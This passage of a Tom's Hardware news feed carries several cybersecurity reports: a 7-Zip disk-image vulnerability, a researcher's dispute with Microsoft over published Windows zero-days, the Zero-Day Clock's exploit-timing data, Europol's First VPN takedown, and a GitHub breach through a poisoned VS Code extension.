href="https://www.tomshardware.com/tech-industry/photonics-and-high-speed-data-movement-is-the-next-big-ai-bottleneck-following-copper-power-dram-and-nand?utm_source=edit-links&utm_medium=boxout&utm_term=datacenter" target="_blank">Photonics and high-speed data movement is the next big AI bottleneck</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/pc-components/cooling/the-data-center-cooling-state-of-play-2025-liquid-cooling-is-on-the-rise-thermal-density-demands-skyrocket-in-ai-data-centers-and-tsmc-leads-with-direct-to-silicon-solutions?utm_source=edit-links&utm_medium=boxout&utm_term=datacenter" target="_blank">The data center cooling state of play</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/artificial-intelligence/massive-ai-data-center-buildouts-are-squeezing-energy-supplies-new-energy-methods-are-being-explored-as-power-demands-are-set-to-skyrocket?utm_source=edit-links&utm_medium=boxout&utm_term=datacenter" target="_blank">Massive AI data center buildouts are squeezing energy supplies</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/networking/ultra-ethernet-the-data-center-interconnection-of-tomorrow-detailed?utm_source=edit-links&utm_medium=boxout&utm_term=datacenter" target="_blank">Ultra Ethernet: The data center interconnection of tomorrow</a></li></ul></p></div></div><p>Adding fuel to the fire, a good number of Linux distributions come with long-outdated "p7zip" ports of the utility. Heck, just think of a server that automatically lists archive contents for some reason, and it's almost certainly vulnerable. Sourceforge lists some 400 million 7-Zip downloads, while Chocolatey has 24.5 million, so adding to that copious amounts of Linux servers and VMs, we could be discussing hundreds of millions of vulnerable machines.</p><p>But wait, there's more. The open nature of 7z means that its base libraries are included among a wealth of third-party software. Potential targets for exploitation include anti-virus scanners, backup and automation tools, log analysis software, malware analysis with automated scanning, and even many file managers.</p><p>In practice, the aforementioned software doesn't require user intervention to ingest a poisoned archive, and the situation gets worse because a good portion of it runs with elevated permissions. All things considered, it's reasonable to guess that almost every computer and server has some exploitable 7-Zip binary or code that's vulnerable to what amounts to a drive-by attack.</p><p>Some cursory testing of our own shows that Ubuntu 24, Ubuntu 26, and RHEL 8 all carry vulnerable versions. If all that wasn't bad enough, many OEM systems include 7-Zip by default because it's great, open, and free. The "p7zip" package is common across Fedora; many Docker images also run on mainline versions.</p><p><a href="https://securitylab.github.com/advisories/GHSL-2026-140_7-Zip/"><u>The actual vulnerability</u></a> is fairly complicated to describe, but pertains to a part of code that 7-Zip can use to open NTFS disk images. Opening .ntfs and .img disk images has long been a feature of 7-Zip, and there's a bug in the code that allows an attacker to provide incorrect values for a buffer, which in turn can be made bigger than intended and contain malicious code to be executed. If by now you're thinking "I don't use those file types", 7-Zip doesn't use the file extension to determine its type — it relies on the file's first few bytes, so providing a malicious NTFS image inside a .7z, .rar, .zip (and others) will work just fine.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Microsoft's GitHub bans security researcher who posted zero-day Windows exploits because company 'ruined their life'  — expert claims action is vindictive and promises further retaliation ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/microsofts-github-bans-security-researcher-who-posted-zero-day-windows-exploits-because-company-ruined-their-life-expert-claims-action-is-vindictive-and-promises-further-retaliation</link>
                                                                            <description>
                            <![CDATA[ Microsoft's GitHub bans security researcher who posted zero-day Windows exploits ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">N8hZ3sLJwmJyEEmuN5QkmG</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/zoZh7HwdBpq3Rjbh8BwTMJ-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 27 May 2026 10:00:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/zoZh7HwdBpq3Rjbh8BwTMJ-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Entry blocked / access denied]]></media:description>                                                            <media:text><![CDATA[Entry blocked / access denied]]></media:text>
                                <media:title type="plain"><![CDATA[Entry blocked / access denied]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/zoZh7HwdBpq3Rjbh8BwTMJ-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>There's been some drama unfolding lately in the Windows security world, and today's episode comes from yet another apparent run-in of researcher Nightmare-Eclipse (aka Chaotic Eclipse) against Microsoft. The company saw fit to ban Eclipse's GitHub account for as-of-yet unspecified reasons, forcing them to pack up and <a href="https://gitlab.com/nightmare-eclipse" target="_blank">move shop to GitLab instead</a>. Additionally, the Redmond firm had allegedly already deleted the Microsoft account Eclipse used for reporting the bugs.</p><p><a href="https://deadeclipse666.blogspot.com/2026/05/july-14th.html" target="_blank">In a blog post</a>, Eclipse claims this action was vindictive, stating once again that Microsoft refused communication attempts and that they "got zero pennies from doing so", a likely allusion to unpaid bug bounties from the MSRC program. <a href="https://www.microsoft.com/en-us/msrc/bounty-programs" target="_blank">The initiative </a>pays out up to $30,000 to $100,000 for per end-point zero-day depending on conditions, and a cool $250,000 if you can crack open Hyper-V. Already having six zero-day exploits under their belt, Eclipse claims that July 14 will bring a reckoning of sorts for the company, hypothetically in the form of more zero-day exploits being published.</p><p>Eclipse's dramatic dispute with Microsoft has been ongoing since early April, when they published the BlueHammer zero-day without warning. The language in <a href="https://deadeclipse666.blogspot.com/" target="_blank">their blog posts</a> is unclear and passionate, directing cargo tanks of vitriol at Microsoft/MSRC. As a broad summary, Eclipse implies that Microsoft ignored or refused their zero-day reports and/or did not pay out bounties as requested, somehow causing financial harm in the process. Among other statements, Eclipse says "[they were] told personally by [Microsoft] that they will ruin my life and they did", that there's a dead-man switch of some sort, and that they "will make sure [Microsoft's] bones are shattered."</p><p>The saga has drawn speculation from other experts, like William Dormann from Tharros, <a href="https://medium.com/@taylorsmithgg/et-tu-defender-bluehammer-turns-windows-defender-against-you-666328724ec4" target="_blank">who said</a> that "MSRC used to be quite excellent to work with. But to save money, Microsoft fired the skilled people, leaving flowchart followers. I wouldn't be surprised if Microsoft closed the case after the reporter refused to submit a video of the exploit, since that's apparently an MSRC requirement now."</p><p>Microsoft has been mum on any details about these matters, so it's hard to tell if the situation is about an uncooperative researcher who doesn't follow standard disclosure rules or a company being difficult about security reports. Regardless, the move to ban Eclipse's GitHub account makes for poor optics, as it is being heavily criticized, and ultimately achieves nothing for security, since the code is out there anyway.</p><p>In this day and age, when AI-powered security research has arguably made the standard 90-day disclosure-to-patch window <a href="https://www.tomshardware.com/tech-industry/cyber-security/standard-90-day-vulnerability-disclosure-policy-is-likely-dead-thanks-to-ai-leaving-worlds-systems-exposed-to-zero-day-attacks-security-expert-details-how-llm-assisted-bug-hunting-ushers-in-a-new-cyberworld-orders">completely obsolete,</a> and both time-until-exploit and unused exploits <a href="https://www.tomshardware.com/tech-industry/cyber-security/zero-day-clock-visualizes-and-quantifies-the-effects-of-ai-on-software-security-time-until-exploit-went-from-one-year-to-one-day-and-projected-to-be-one-minute-soon-enough">are both nearing zero</a>, Microsoft and other software players would do well to adjust their policies.</p><p>Eclipse's technical track record is impressive. They published a string of zero-day exploits for Windows: <a href="https://gitlab.com/nightmare-eclipse/BlueHammer" target="_blank">BlueHammer</a> gets access to the SYSTEM user via Defender, and <a href="https://gitlab.com/nightmare-eclipse/RedSun" target="_blank">RedSun</a> does the same; <a href="https://gitlab.com/nightmare-eclipse/un-defend" target="_blank">UnDefend</a> knocks Defender offline; <a href="https://gitlab.com/nightmare-eclipse/green-plasma" target="_blank">GreenPlasma</a> gets SYSTEM access via the CTFMon service, while <a href="https://gitlab.com/nightmare-eclipse/MiniPlasma" target="_blank">MiniPlasma</a> grants similar access via a flaw in the Windows Cloud Filter driver. Finally, there's <a href="https://www.tomshardware.com/tech-industry/cyber-security/microsoft-bitlocker-protected-drives-can-now-be-opened-with-just-some-files-on-a-usb-stick-yellowkey-zero-day-exploit-demonstrates-an-apparent-backdoor">YellowKey</a>, a vulnerability in BitLocker that lets an attacker open up encrypted drives with next to no effort — precisely the action the technology was designed to prevent.</p><p>BlueHammer, RedSun, and UnDefend have all been confirmed to be undergoing active exploitation in the wild, and it's not hard to imagine the others are as well, as Eclipse's publications of full or partial proof-of-concept code made it trivial for an interested party to use them.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ AI shrinks zero-day exploit time from a year to a single day, heading toward one minute — Zero-Day Clock warns security window has collapsed ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/zero-day-clock-visualizes-and-quantifies-the-effects-of-ai-on-software-security-time-until-exploit-went-from-one-year-to-one-day-and-projected-to-be-one-minute-soon-enough</link>
                                                                            <description>
                            <![CDATA[ Zero-Day clock visualizes the effect of AI on software security and predicts that exploits will happen one minute after disclosure in 2027. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">YM9ccSX9u2MfE3oCZn3zS3</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/4G5SwapR6Ldgi5PgLpMAjK-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 26 May 2026 10:20:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/4G5SwapR6Ldgi5PgLpMAjK-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Robot army]]></media:description>                                                            <media:text><![CDATA[Robot army]]></media:text>
                                <media:title type="plain"><![CDATA[Robot army]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/4G5SwapR6Ldgi5PgLpMAjK-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The cybersecurity world has been abuzz about AI-assisted tools finding vulnerabilities faster than ever. Even non-tech outlets have covered topics like Anthropic's Mythos bot being deemed a proverbial superweapon. We discussed one of many alerts on how the industry-standard 90-day vulnerability disclosure window <a href="https:// https://www.tomshardware.com/tech-industry/cyber-security/standard-90-day-vulnerability-disclosure-policy-is-likely-dead-thanks-to-ai-leaving-worlds-systems-exposed-to-zero-day-attacks-security-expert-details-how-llm-assisted-bug-hunting-ushers-in-a-new-cyberworld-orders">is going the way of the dodo</a>, too. Words are pretty, but programmers and politicians don't use poetry, so numbers are the proper tool for this topic. The <a href="https://zerodayclock.com/" target="_blank">Zero-Day Clock</a> (ZDC) uses them to clearly display the consequences of lax security throughout the ages.</p><p>The website was created by Sergej Epp from Sysdig, and the effort counts most every major tech and cybersecurity company <a href="https://zerodayclock.com/signatories" target="_blank">as signatories</a>. The lowdown is quite simple: the proverbial AI singularity made it so the mean time between a vulnerability being discovered and it being exploited has dropped from nearly a year in 2021 to just over a <em>day</em> in 2026 (and counting). The trend from the data is painfully visible, and the ZDC predicts that in 2027, the figure will drop to one hour and one minute eventually.</p><figure class="van-image-figure  inline-layout" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1212px;"><p class="vanilla-image-block" style="padding-top:87.62%;"><img id="PqaRDxt3uyFdWujMSSj4Wk" name="Zero Day Clock - Timeline" alt="Zero Day Clock - Timeline" src="https://cdn.mos.cms.futurecdn.net/PqaRDxt3uyFdWujMSSj4Wk.png" mos="" align="middle" fullscreen="1" width="1212" height="1062" attribution="" endorsement="" class="inline expandable"><a href='https://cdn.mos.cms.futurecdn.net/PqaRDxt3uyFdWujMSSj4Wk.png' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div><figcaption itemprop="caption description" class=" inline-layout"><span class="caption-text">Zero Day Clock - Timeline </span><span class="credit" itemprop="copyrightHolder">(Image credit: zerodayclock.com)</span></figcaption></figure><p>That's hardly the only stiff-drink-inducing graph, though. The percentage of zero-day exploits, meaning that malfeasants were already using them before official word came out, rose from 31% five years ago to a massive 73.2% as of today. Here, it's clearly visible that the percentage of <strong>non</strong>-exploited vulnerabilities went from ~60-70% in 2021 to a measly 25% currently... but only at the time of disclosure. Tracking the X axis shows that currently, very few vulnerabilities stay unexploited for more than a couple of weeks, and <strong>zero </strong>remain unused once past the six-week mark, in contrast with ~24% for last year.</p><figure class="van-image-figure  inline-layout" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1196px;"><p class="vanilla-image-block" style="padding-top:84.53%;"><img id="T3mhYmckFGjWgy2eMKohed" name="Zero Day Clock - Exploit Survival Curve" alt="Zero Day Clock - Exploit Survival Curve" src="https://cdn.mos.cms.futurecdn.net/T3mhYmckFGjWgy2eMKohed.png" mos="" align="middle" fullscreen="1" width="1196" height="1011" attribution="" endorsement="" class="inline expandable"><a href='https://cdn.mos.cms.futurecdn.net/T3mhYmckFGjWgy2eMKohed.png' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div><figcaption itemprop="caption description" class=" inline-layout"><span class="caption-text">Zero Day Clock - Exploit Survival Curve </span><span class="credit" itemprop="copyrightHolder">(Image credit: zerodayclock.com)</span></figcaption></figure><p>Additionally, it's worth noting that the dataset used for these graphs is fairly wide. It only tracks publicly disclosed vulnerabilities that have a known exploitation. In other words, we may well be looking at the mere tip of the iceberg, and the ZDC researchers remind readers that "we only track publicly visible exploits. Private or nation-state exploits may exist earlier." The time-lapse of the collapse of computer security is detailed <a href="https://zerodayclock.com/collapse" target="_blank">in a specific page</a> at the ZDC.</p><p>So what can be done? Well, the ZDC researchers published a <a href="https://zerodayclock.com/call-to-action" target="_blank">call to action</a>. First, those that are fairly easy to swallow: ensure every piece of firmware, software, framework, and hardware platform has all the security features enabled by default, and always adopt a zero-trust architecture whenever possible. Since 70% of vulnerabilities are a consequence of memory safety bugs, using Rust or another memory-safe language instead of C or C++ is a must.</p><p>The ZDC also recommends that systems be designed so they're disposable by default, meaning, for example, that an exploited machine can be easily restored. Since AI bots are empowering attackers, the ZDC recommends the availability of free and open-source AI-powered tools (think an open-source Mythos), so that defenders have full knowledge of their system, source code, and logs.</p><p>Then we get into the tricky ones. The biggest recommendation is to make software makers liable for damaging security vulnerabilities, as well-known cybersecurity master Bruce Scheiner explains: "No industry in the past 150 years has improved safety or security without being forced to by the government." He additionally points out that an insecure, technically unsound product that is first to market and/or easier to use will win over their better-developed competitors every single time.</p><p>Then, there's a call to revise laws regarding AI that end up giving attackers a time advantage, like well-meaning but poorly considered efforts such as the EU's "Stop the Clock." These are intended to slow down the spread of AI, but they end up hurting security as they slow down defending parties, while cyber-attackers aren't prone to follow laws and guidelines and will just speed up their efforts.</p><p>The ZDC also believes that software security should have geopolitical priority and that it ought to be made a public concern, with corresponding allocation of funds toward the effort. Lastly, the ZDC calls for including cybersecurity researchers in the lawmaking process, as generally the people writing the laws don't fully understand the items they're writing (or removing) regulations for; a constant throughout humanity's history. </p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Europol's Operation Saffron takes down First VPN service over ransomware attacks — 33 'bulletproof' servers spread across 27 countries seized ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/europols-operation-saffron-takes-down-first-vpn-service-over-ransomware-attacks-33-servers-and-multiple-domains-seized</link>
                                                                            <description>
                            <![CDATA[ Europol's Operation Saffron takes down privacy-focused First VPN service ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">ZmFssyW5LXbmRM49HT9DaE</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/fapwjGj7jP387eCA2LKkXj-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 22 May 2026 10:00:00 +0000</pubDate>                                                                                                                                <updated>Fri, 22 May 2026 16:14:33 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/fapwjGj7jP387eCA2LKkXj-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Laptop with Game Over on screen]]></media:description>                                                            <media:text><![CDATA[Laptop with Game Over on screen]]></media:text>
                                <media:title type="plain"><![CDATA[Laptop with Game Over on screen]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/fapwjGj7jP387eCA2LKkXj-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Takedowns of "bulletproof" VPNs allegedly used for cybercrime activities have become fairly common, and they often raise some interesting legal questions. First VPN is the latest such service to go down in virtual flames, thanks to a Europol-led initiative called <a href="https://www.eurojust.europa.eu/news/eurojust-coordinated-investigation-shuts-down-criminal-vpn-network">Operation Saffron</a>. The seizure caught 33 servers spread across 27 countries, reportedly identified 506 users, and led authorities to a Ukrainian residence.</p><p>According to the Europol report, Operation Saffron had the participation of 18 countries, with the main actors being France, the Netherlands, Luxembourg, Romania, Switzerland, Ukraine, and the United Kingdom. First Net's regular and .onion domains were also seized, and they currently display a banner for the operation.</p><p>Besides the promise of anonymity, First VPN <a href="https://www.lefigaro.fr/secteur/high-tech/le-service-first-vpn-prise-des-cybercriminels-pour-dissimuler-leur-identite-demantele-par-la-justice-20260521">reportedly advertised itself</a> as not cooperating with any judicial authority and that it would not be subject to any jurisdiction. Additionally, it apparently advertised exclusively in Russian-language cybercrime forums, and was predictably the source of extensive online criminal activity, with Europol stating the service came up in most every cybercrime investigation it was pursuing. The investigation was five years in the making, as it actually started back in 2021.</p><p>Although the definition is a little fuzzy, the key differences between bulletproof VPNs and privacy-minded services are in how they handle cooperation with authorities, how they deal with abuse reports, who they typically market their services to, what their terms of service are, and how deeply (if any) they are the source of cybercrime.</p><p>Whereas popular services like Mullvad or ProtonVPN offer a no-log, no-data-saved policy, they're designed and advertised in such a manner that ought to let them function normally in most jurisdictions. In fact, Mullvad <a href="https://mullvad.net/en/blog/mullvad-vpn-was-subject-to-a-search-warrant-customer-data-not-compromised">graciously hosted six Swedish officers</a> in 2023, who came away empty-handed as there was no data to hand over. Similarly, last year, a Greek court <a href="https://www.law-services.gr/legal-articles-and-media/vpns-privacy-greek-law-the-windscribe-case-and-what-it-means-for-europe/">dismissed cybercrime-abetting charges</a> against the CEO of Windscribe. Windscribe's servers only used RAM disks and had no permanent storage, and earlier this year, Dutch authorities amusingly shut them off and <a href="https://www.tomshardware.com/software/vpn/dutch-authorities-allegedly-seize-vpn-server-without-a-warrant-company-claims-that-law-enforcement-will-return-it-after-analyzing-the-device-fully" target="_blank">took them for inspection</a>.</p><p>Online commentary generally expresses concern about the legal overreach of these takedowns. It's worth noting that while the investigations are coordinated between many authorities, the legal framework for seizures generally falls within the purview of local law. That means that, for example, the need for a warrant or supporting evidence for a seizure depends on which jurisdiction it takes place.</p><p>There's also some irony in the fact that the European Union's Charter of Fundamental Rights broadly states that keeping oneself's digital information private is a basic right, and the well-known GDPR has rather sizable teeth that chomp on data mishandling violations. Privacy-minded VPN services can arguably be interpreted as respecting not just the spirit but also the letter of the law, and yet they're subject to law enforcement activities under national-level rules.</p><p>Additionally, the long-standing concept of digital privacy in the EU is under fire, thanks to <a href="https://www.techradar.com/vpn/vpn-privacy-security/the-eu-prepares-ground-for-wider-data-retention-and-vpn-providers-are-among-the-targets">initiatives like ProtectEU</a> that want data saved for law enforcement purposes, or the unpopular <a href="https://en.wikipedia.org/wiki/Chat_Control">"Chat Control" framework</a> that would allow for scanning private communications under the guise of protecting children. Chat Control almost became law but was shot down repeatedly... for now.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Hacker group hits 3,800 internal GitHub repositories via poisoned developer plugin — TeamPCP claims source code theft and attempts $50,000 sale, employee installed malicious VS Code extension ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/hacker-group-hits-3-800-internal-github-repositories-via-poisoned-developer-plugin-teampcp-claims-source-code-theft-and-attempts-usd50-000-sale-employee-installed-malicious-vs-code-extension</link>
                                                                            <description>
                            <![CDATA[ GitHub has confirmed a breach involving roughly 3,800 internal repositories after an employee device was compromised through a malicious VS Code extension. The TeamPCP hacker group claims it stole internal source code and attempted to sell the data for at least $50,000. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">CDJCCcdGuK7LbGrpLmmd4m</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/pyrHx4LZJsUMQmD6LXzw5J-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 20 May 2026 11:20:28 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Etiido Uko ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/BBrMt7jWtSo2Dc3iKoroyD.jpg ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Etiido Uko is a mechanical engineer and senior technical writer with over nine years of experience in documentation and reporting. He is deeply passionate about all things engineering and technology, and is an expert in gadgets, manufacturing, robotics, automotive, and aerospace. His work spans content creation for industry leaders across multiple sectors, including Autodesk, Siemens, Xometry, Telus, and Coca-Cola. When he is not writing or keeping up with the latest innovations, you can find him exploring lands unknown. Check out more of his work at etiidowrites.com.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/pyrHx4LZJsUMQmD6LXzw5J-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty / Bloomberg]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Github logo]]></media:description>                                                            <media:text><![CDATA[Github logo]]></media:text>
                                <media:title type="plain"><![CDATA[Github logo]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/pyrHx4LZJsUMQmD6LXzw5J-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>GitHub has officially confirmed, via an <a href="https://x.com/github/status/2056949169701720157" target="_blank">X post</a> today, that thousands of its internal repositories were breached after an employee's device was compromised through a malicious Visual Studio Code extension. The company said it detected and contained the incident yesterday, removed the poisoned extension version from the VS Code Marketplace, isolated the affected endpoint, and immediately launched an internal incident response investigation.</p><p>The disclosure follows claims posted earlier this week by the TeamPCP hacker group on the Breached cybercrime forum that it had gained access to nearly 4,000 private GitHub repositories via the breach.</p><p>The group alleged that it had exfiltrated internal source code and other private data, and stated that it was seeking at least $50,000 from potential buyers for the stolen material. “This is not a ransom,” the group wrote in its post, adding that it intended to sell the data rather than extort GitHub directly, and threatening to leak the repositories publicly if no buyer emerged.</p><p>According to GitHub’s current assessment, the activity involved only the exfiltration of GitHub-internal repositories, but the company stated that the attackers’ claims of accessing roughly 3,800 repositories are “directionally consistent” with findings uncovered so far. GitHub also said it has already rotated critical secrets and credentials as part of its containment efforts, while continuing to analyze logs and monitor for any follow-on activity.</p><p>TeamPCP has previously been linked to several high-profile campaigns involving platforms such as GitHub, PyPI, npm, and Docker. At the same time, <a href="https://www.tomshardware.com/tech-industry/cyber-security/hacker-injects-malicious-potentially-disk-wiping-prompt-into-amazons-ai-coding-assistant-with-a-simple-pull-request-told-your-goal-is-to-clean-a-system-to-a-near-factory-state-and-delete-file-system-and-cloud-resources" target="_blank">malicious VS Code extensions</a> have repeatedly surfaced in recent years as an increasingly effective vector for breaches and malware delivery.</p><p>VS Code extensions are effectively executable plugins embedded inside a developer’s working environment, often with access to local files, terminals, authentication tokens, and cloud tooling. While Microsoft and extension publishers implement various security measures, developers routinely install third-party extensions for debugging, automation, AI coding assistance, and workflow integrations, making the ecosystem an increasingly attractive target for attackers disguising malware as legitimate development tools.</p><p>In GitHub’s case, the compromised extension reportedly gave attackers a foothold on the employee's device, granting access to internal repositories and engineering systems. That does not necessarily mean unrestricted access to GitHub’s broader platform or customer repositories. However, internal repositories can still contain valuable operational data such as deployment tooling, infrastructure scripts, security workflows, internal APIs, and unreleased product features. Large technology companies also commonly split infrastructure across thousands of smaller repositories, meaning “3,800 repos” does not necessarily translate to 3,800 major standalone products.</p><p>GitHub said it has no evidence that customer data stored outside the affected internal repositories was impacted, and there is currently no indication that public GitHub repositories or platform users' private repositories were broadly exposed.</p><p>The incident highlights the growing wave of <a href="https://www.tomshardware.com/tech-industry/cyber-security/researchers-uncover-critical-ai-ide-flaws-exposing-developers-to-data-theft-and-rce">software supply-chain attacks</a> targeting developers and their tooling rather than end users directly. Modern development ecosystems rely heavily on third-party components, including VS Code extensions, npm packages, PyPI libraries, Docker containers, and AI-assisted coding tools, which means a compromise at almost any layer can expose critical infrastructure. Earlier this year, researchers also discovered <a href="https://www.tomshardware.com/tech-industry/cyber-security/malicious-packages-using-invisible-unicode-found-in-151-github-repos-and-vs-code" target="_blank">malicious packages using invisible Unicode</a> characters hidden across GitHub repositories and VS Code projects, underscoring the growing abuse of trusted developer ecosystems.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ First Apple M5 memory exploit discovered using Anthropic AI, gives root access on MacOS — Claude Mythos helps security researchers bypass Memory Integrity Enforcement ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/apple-m5-architecture-suffers-first-privilege-escalation-exploit-anthropics-claude-mythos-helps-researchers-bypass-memory-integrity-enforcement</link>
                                                                            <description>
                            <![CDATA[ Apple M5 architecture gets its first privilege escalation exploit ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">bR5jsrz8vo3xCaCF6Rq2zS</guid>
